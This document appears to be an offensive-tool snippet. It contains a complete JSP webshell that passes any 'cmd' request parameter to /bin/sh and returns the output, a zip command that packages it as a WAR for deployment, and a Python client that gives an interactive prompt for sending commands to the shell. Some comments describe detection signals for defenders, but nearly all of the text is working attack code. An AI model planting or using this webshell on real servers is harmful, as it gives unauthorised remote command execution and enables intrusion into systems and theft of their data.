JSP Webshell

Create WAR

zip -r ../shell.war *

<%@ page import="java.util.*,java.io.*"%>
<%-- Webshell page: when a request carries a "cmd" parameter, its value is handed
     verbatim to /bin/sh and the command's stdout followed by its stderr is written
     into the HTTP response body.
     Defender notes: the request-side signal is any hit on this JSP with a "cmd"
     parameter (it is read with getParameter, so it can arrive in the query string
     or a form body); the host-side signal is the servlet container's JVM spawning
     /bin/sh, since Runtime.exec runs the child under the container's own identity. --%>
<%
// Without a "cmd" parameter nothing is written: the response body is only the
// template whitespace, so the page looks inert on a plain fetch.
if (request.getParameter("cmd") != null)
{
// The parameter is passed unmodified as the -c argument; no filtering or
// quoting is applied anywhere on this page.
String[] cmd = {"/bin/sh","-c",request.getParameter("cmd")};
Process p = Runtime.getRuntime().exec(cmd);
InputStream in = p.getInputStream();
InputStream err = p.getErrorStream();
// Copy stdout line by line until EOF (readLine returns null).
DataInputStream dis = new DataInputStream(in);
String disr = dis.readLine();
while ( disr != null )
{
out.println(disr);
disr = dis.readLine();
}
// Then stderr, appended after stdout in the same response.
dis = new DataInputStream(err);
disr = dis.readLine();
while ( disr != null )
{
out.println(disr);
disr = dis.readLine();
}
// NOTE(review): the child process is neither waited on nor destroyed here;
// presumably its resources are released when the Process object is collected.
}
%>
#!/usr/bin/env python3
import requests
import readline
import argparse
def webexec(url: str, cmd: str) -> None:
    """Send one shell command to the webshell at *url* and print the reply body.

    Relies on the module-level ``session`` that is only created under
    ``__main__``; calling this function after importing the module raises
    ``NameError`` because ``session`` is never defined in that case.

    The command is sent via ``params=`` (query string), not ``data=``, so it
    forms part of the request URL and is visible in any web-server access log
    that records the request line.
    """
    data = {'cmd': "{0}".format(cmd)}
    r = session.post(url, params=data)
    # Output is printed only for HTTP 200; every other status is silently dropped.
    if r.status_code == 200:
        print(r.content.decode(errors='replace').strip())
if __name__ == "__main__":
    # Suppress the warning requests emits for each unverified HTTPS request
    # (certificate verification is switched off on the session below).
    requests.packages.urllib3.disable_warnings(requests.packages.urllib3.exceptions.InsecureRequestWarning)
    parser = argparse.ArgumentParser(description='Execute command against a webshell')
    parser.add_argument('url', help='The base URL: https://127.0.0.1:8081')
    args = parser.parse_args()
    # Module-level session; webexec() reads it as a global.
    session = requests.Session()
    # TLS certificate verification disabled: any server certificate is accepted.
    session.verify = False
    # All HTTP and HTTPS traffic is routed through a hard-coded local proxy on
    # 127.0.0.1:8080. NOTE(review): if nothing listens there, requests raises a
    # connection/proxy error that the loop below does not catch — confirm.
    session.proxies = {'http':'http://127.0.0.1:8080', 'https':'http://127.0.0.1:8080'}
    # Prompt loop: blank input is skipped, Ctrl-C (KeyboardInterrupt) exits.
    # The `readline` import above only serves to give input() line editing.
    while True:
        try:
            cmd = input('$ ')
            if cmd != '':
                webexec(args.url, cmd)
        except KeyboardInterrupt:
            break